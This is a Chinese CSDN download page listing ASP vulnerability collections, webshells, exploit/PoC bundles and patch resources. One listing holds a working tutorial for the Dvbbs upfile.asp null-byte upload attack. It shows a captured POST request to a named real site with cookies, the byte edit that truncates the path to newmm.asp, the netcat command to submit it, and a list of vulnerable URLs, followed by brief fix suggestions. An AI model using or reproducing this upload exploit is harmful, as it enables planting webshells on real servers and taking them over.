下载 >  开发技术 >  C# > ASP漏洞集合
0分

ASP漏洞集合

ASP漏洞集合------------
2007-08-01 上传大小:361KB
立即下载 开通VIP
分享
收藏 举报
ASP漏洞集合压缩包

ASP漏洞集合,ASP漏洞分析和解决方法等等

立即下载
3积分/C币
360独家防注入跨站脚本攻击漏洞补丁php-asp-jsp

360独家防注入跨站脚本攻击漏洞补丁php-asp-jsp

立即下载
3积分/C币
asp网站W e b S h e l l程序

asp 漏洞 程序asp 漏洞 程序asp 漏洞 程序asp 漏洞 程序asp 漏洞 程序

立即下载
3积分/C币
最全的ASP漏洞集合

这是网上最全面的ASP漏洞集合 如果您觉得满意就给个好评

立即下载
3积分/C币
ASP漏洞集合111

ASP漏洞集合,现用或想学asp的的人员注意了,多了解下,希望能将你的网站安全性提高到新的台阶

立即下载
3积分/C币
带SQL注入的一个ASP网站源码

带SQL注入的一个ASP网站源码,ASP+ACCESS手动注入环境搭建,用来练手不错!

立即下载
4积分/C币
asp常见漏洞集合 ASP漏洞分析和解决方法

这位大哥写的很不错~ 所以就放上来了~~! asp常见漏洞集合 ASP漏洞分析和解决方法 ASP主件中的安全问题 Carello Web 使 ASP 源码暴露 (APP,缺陷) MS IIS server的ASP安全缺陷 (MS,缺陷) MS IIS虚拟主机ASP源码泄露 (MS,缺陷) 给你的FileSystemObject对象加把锁 跨站Script攻击和防范 使用ASP加密算法加密你的数据 通过asp入侵web server,窃取文件毁坏系统 微软dvwssr.dll后门 虚拟web目录容易泄露ASP源代码 (MS,缺陷) 用ASP实现网页保密的两种方法

立即下载
3积分/C币
ASP+ACCESS带SQL注入网站源码

ASP+ACCESS带SQL注入网站源码,完美适合网络安全初学者的SQL注入案例

立即下载
3积分/C币
系统集合漏洞(IE网马)

系统集合漏洞(IE网马) 下载系统集合漏洞(IE网马) 下载系统集合漏洞(IE网马) 下载系统集合漏洞(IE网马) 下载系统集合漏洞(IE网马) 下载系统集合漏洞(IE网马) 下载系统集合漏洞(IE网马) 下载系统集合漏洞(IE网马) 下载

立即下载
3积分/C币
ASP漏洞网站

有漏洞网站,这个网站可以供服务器使用,这里我们可以用IIS搭建试试这个网站

立即下载
3积分/C币
ASP漏洞集.rar

ASP漏洞集,网络ASP的常见漏洞

立即下载
3积分/C币
asp漏洞分析和解决方法

ASP目前存在的漏洞信息,asp漏洞解决方法

立即下载
3积分/C币
asp漏洞修复

asp漏洞修复 有效防止asp跨站脚本攻击漏洞

立即下载
3积分/C币
常见Exp漏洞POC集合

该资源为bugscan收集的漏洞poc,喜欢的可以下载下来看看,有需要其他资源的也可以发邮件与我交流shulanyy@gmail.com,作为爱好他是免费的。

立即下载
5积分/C币
upfile_photo.asp上传漏洞修复

upfile_photo.asp upfile_other.asp 几个企业cms上传漏洞修复

立即下载
3积分/C币
网站漏洞扫描

当前web已经在企业内网,电子商务,综合信息化中得到广泛应用,越来越多的企业都将应用架设在web平台上,这也引发了严重的安全问题。事实上,根据调查,信息安全攻击有75%发生在web应用层而非网络层面上,60%的web站点都相当脆弱,易受攻击。

立即下载
5积分/C币
ASP漏洞集.rarASP漏洞集.rarASP漏洞集.rar

ASP漏洞集.rarASP漏洞集.rarASP漏洞集.rarASP漏洞集.rarASP漏洞集.rar

立即下载
3积分/C币
伪造gif文件的处理

用于asp上传组件中出现漏洞处理措施 用于asp上传组件中出现漏洞处理措施 用于asp上传组件中出现漏洞处理措施 用于asp上传组件中出现漏洞处理措施

立即下载
3积分/C币
ASP注入應用漏洞解決方法精粹

ASP注入應用漏洞解決方法精粹ASP注入應用漏洞解決方法精粹

立即下载
3积分/C币
先锋无组件上传类(无惧2.0杜绝上传漏洞修改版) v2004

上传漏洞终结篇 一、写在前面 ***这个上传漏洞利用的原理只是针对form格式上传的asp和php脚本*** NC(Netcat)   用于提交数据包   DOS界面下运行:   NC -vv www.***.com 80<1.txt   -vv: 回显   80: www端口   1.txt: 就是你要发送的数据包  (更多使用方法请查看本区的帖子) WSE(WSockExpert)   对本机端口的监视,抓取IE提交的数据包  (不会用的就自己到网上搜资料N多) 二、漏洞原理 下面例子假设的前提 www主机: www.***.com; bbs路径 : /bbs/ 漏洞源于对动网上传文件的研究,建议有一定编程经验的 看看Dvbbs的upfile.asp文件,没有必要全部看懂 upfile是通过生成一个form表上传,如下 <form name="form" method="post" action="upfile.asp" ...> <input type="hidden" name="filepath" value="uploadFace"> <input type="hidden" name="act" value="upload"> <input type="file" name="file1"> <input type="hidden" name="fname"> <input type="submit" name="Submit" value="上传" ...></form> 用到的变量: filepath 默认值uploadface 属性hiden act   默认值upload   属性hiden file1  就是你要传的那个文件 关键是 filepath 这个变量! 默认情况下我们的文件上传到www.***.com/bbs/uploadface/ 文件是用你的上传时间命名的,就是upfile里的这一句 FileName=FormPath&year(now)&month(now)&day(now)&hour(now)&minute(now)&second(now)&ranNum&"."&FileExt ------------------------------------------------------------------------- 我们知道计算机里面的数据是一"\0"为标致的用过C语言的都知道 char data[]="bbs" 这个data数组长度是4: b b s \0 如果我们构造filepath如下,会怎么样呢? filepath="/newmm.asp\0" 我们在2004.09.24.08.24传的文件就会发生变化 没有改时: http://www.***.com/bbs/uploadface/200409240824.jpg 用我们构造的filepath时: http://www.***.com/newmm.asp\0/200409240824.jpg 这样当服务器接收filepath数据时,检测到newmm.asp后面的\0 就理解为filepath的数据就结束了 这样我们上传的文件,比如c:\1.asp 就保存成: http://www.***.com/newmm.asp 三、后期补充 漏洞公布以后很多网站做了相应的处理,但是对于filepath的过滤和处理都不行 有很多网站只是加了N个hiden属性的变量对付网上公布的upfile.exe就是那个 上传漏洞利用工具或者filepath变量利用工具(老兵的)...但是最基本的没改啊。。 而且很对网站的插件里有类似的漏洞,我要说的不要依赖哪些专门的工具 自己改WSE抓到的包里的filepath变量,然后在用NC提交。。。 就算他加N个hiden变量也于事无补。 当然,如果对filepath做了很严格的过滤的话我们的这些理论就将宣告终结 就是我们的新理论诞生的时候! 四、漏洞列表 http://dvd.3800cc.com/dispbbs.asp?BoardID=20&ID=5369http://dvd.3800cc.com/dispbbs.asp?BoardID=20&ID=5530http://dvd.3800cc.com/dispbbs.asp?BoardID=20&ID=5531http://dvd.3800cc.com/dispbbs.asp?BoardID=20&ID=5693http://dvd.3800cc.com/dispbbs.asp?BoardID=20&ID=5731http://dvd.3800cc.com/dispbbs.asp?BoardID=20&ID=5746 监听外部主机     NC [-options] hostname port[s] [ports] ... 监听本地主机     NC -l -p port [options] [hostname] [port] options:     -d       detach from console, stealth mode     -e prog     inbound program to exec [dangerous!!]     -g gateway   source-routing hop point[s], up to 8     -G num     source-routing pointer: 4, 8, 12, ...     -h       this cruft     -i secs     delay interval for lines sent, ports scanned     -l       listen mode, for inbound connects     -L       listen harder, re-listen on socket close     -n       numeric-only IP addresses, no DNS     -o file     hex dump of traffic     -p port     local port number     -r       randomize local and remote ports     -s addr     local source address     -t       answer TELNET negotiation     -u       UDP mode     -v       verbose [use twice to be more verbose]     -w secs     timeout for connects and final net reads     -z       zero-I/O mode [used for scanning] port numbers can be individual or ranges: m-n [inclusive] 详细实例: --------------------------------------------------------------------------------- 一、WSE抓包结果(存到1.txt里): POST /bbs/upPhoto/upfile.asp HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Referer: http://www.xin126.com/bbs/upPhoto/upload.asp Accept-Language: zh-cn Content-Type: multipart/form-data; boundary=---------------------------7d423a138d0278 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322) Host: www.xin126.com Content-Length: 1969 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDACCCCDCS=NJHCPHPALBCANKOBECHKJANF; isCome=1; GAMVANCOOKIES=1; regTime=2004%2D9%2D24+3%3A39%3A37; username=szjwwwww; pass=5211314; dl=0; userID=62; ltStyle=0; loginTry=1; userPass=eb03f6c72908fd84 -----------------------------7d423a138d0278 Content-Disposition: form-data; name="filepath" ../medias/myPhoto/ -----------------------------7d423a138d0278 ... ... 上传 -----------------------------7d423a138d0278-- --------------------------------------------------------------------------------- 二、UltraEdit打开1.txt改数据: ...... -----------------------------7d423a138d0278 Content-Disposition: form-data; name="filepath" /newmm.asp█         <===这个黑色代表一个空格是 0x20,改成0x00就可以了 ...... --------------------------------------------------------------------------------- 三、重新计算cookies长度,然后nc提交 Nc -vv www.xin126.com 80 <1.txt UltraEdit是一个16位编辑器网上可以下载得到 我们主要用来写那个结束标致: \0 ====>16位表示:0x00或者00H 其实你改的时候就直接再filepath的结尾处加个00就OK了 计算cookies长度===>你把fillepath改了之后、肯定是或+或—cookies的长度变了 ...... Host: www.xin126.com Content-Length: 1969 <======就是这个 Connection: Keep-Alive Cache-Control: no-cache ...... 计算会吧?一个字母、数字就是1 对于上传漏洞提出的解决思路:(仅供参考) 1、一般的上传是把上传路径作为一个变量来处理 ===>我们的对策就是把filepath变成常量。。。 这个方法是目前最有效的(我认为的) 2、加强对于\0的处理,原来我们是读到这里就结束 我们继续读直道下一个变量开始的地方,处理就OK了

立即下载
3积分/C币
wxh Asp网站脚本漏洞的安全防范

Asp网站 脚本漏洞的安全防范 Asp网站脚本漏洞的安全防范

立即下载
3积分/C币
微软出品的asp注射漏洞分析工具.rar

微软出品的asp注射漏洞分析工具.rar微软出品的asp注射漏洞分析工具.rar

立即下载
3积分/C币
nbsi3.0网站漏洞检测增强版

nbsi3.0网站漏洞检测工具,ASP,PHP网站漏洞检测的有力用具

立即下载
3积分/C币
asp+access注入网站源码

个人博客:实战初级SQL注入-access篇,所涉及的网站源码,如有侵权冒犯,请联系我。

立即下载
3积分/C币
收集的一些EXP大合集

收集的一些EXP,打包下载!

立即下载
3积分/C币
ASP安全与预防电子书-漏洞集合与解决方案

SP漏洞分析和解决方法 ASP主件中的安全问题 Carello Web 使 ASP 源码暴露 (APP,缺陷) MS IIS server的ASP安全缺陷 (MS,缺陷) MS IIS虚拟主机ASP源码泄露 (MS,缺陷) 给你的FileSystemObject对象加把锁 跨站Script攻击和防范 使用ASP加密算法加密你的数据 通过asp入侵web server,窃取文件毁坏系统 微软dvwssr.dll后门 虚拟web目录容易泄露ASP源代码 (MS,缺陷) 用ASP实现网页保密的两种方法

立即下载
3积分/C币
SQL注入漏洞演示源代码

SQL注入漏洞演示源代码 更多免费资源请查看:http://download.csdn.net/user/php_fly

立即下载
50积分/C币
ASP漏洞及安全建议.doc

ASP漏洞及安全建议.doc

立即下载
3积分/C币
0day漏洞大集合

0day漏洞 最新0day 突破安全狗 web渗透利用工具 仅供学习研究

立即下载
3积分/C币
asp的防注入代码通用防注入代码

asp通用防注入代码 ;解决注入问题,asp漏洞问题。。

立即下载
3积分/C币
关闭
img

spring mvc+mybatis+mysql+maven+bootstrap 整合实现增删查改简单实例.zip

资源所需积分/C币 当前拥有积分 当前拥有C币
5 0 0
点击完成任务获取下载码
输入下载码
为了良好体验,不建议使用迅雷下载
img

ASP漏洞集合

会员到期时间: 剩余下载个数: 剩余C币: 剩余积分:0
为了良好体验,不建议使用迅雷下载
VIP下载
您今日下载次数已达上限(为了良好下载体验及使用,每位用户24小时之内最多可下载20个资源)

积分不足!

资源所需积分/C币 当前拥有积分
您可以选择
开通VIP
4000万
程序员的必选
600万
绿色安全资源
现在开通
立省522元
或者
购买C币兑换积分 C币抽奖
img

资源所需积分/C币 当前拥有积分 当前拥有C币
5 4 45
为了良好体验,不建议使用迅雷下载
确认下载
img

资源所需积分/C币 当前拥有积分 当前拥有C币
5 0 0
为了良好体验,不建议使用迅雷下载
VIP和C币套餐优惠
img

资源所需积分/C币 当前拥有积分 当前拥有C币
5 4 45
您的积分不足,将扣除 10 C币
为了良好体验,不建议使用迅雷下载
确认下载
下载
您还未下载过该资源
无法举报自己的资源

兑换成功

你当前的下载分为234开始下载资源
你还不是VIP会员
开通VIP会员权限,免积分下载
立即开通

你下载资源过于频繁,请输入验证码

您因违反CSDN下载频道规则而被锁定帐户,如有疑问,请联络:webmaster@csdn.net!

举报

若举报审核通过,可返还被扣除的积分

  • 举报人:
  • 被举报人:
  • *类型:
    • *投诉人姓名:
    • *投诉人联系方式:
    • *版权证明:
  • *详细原因: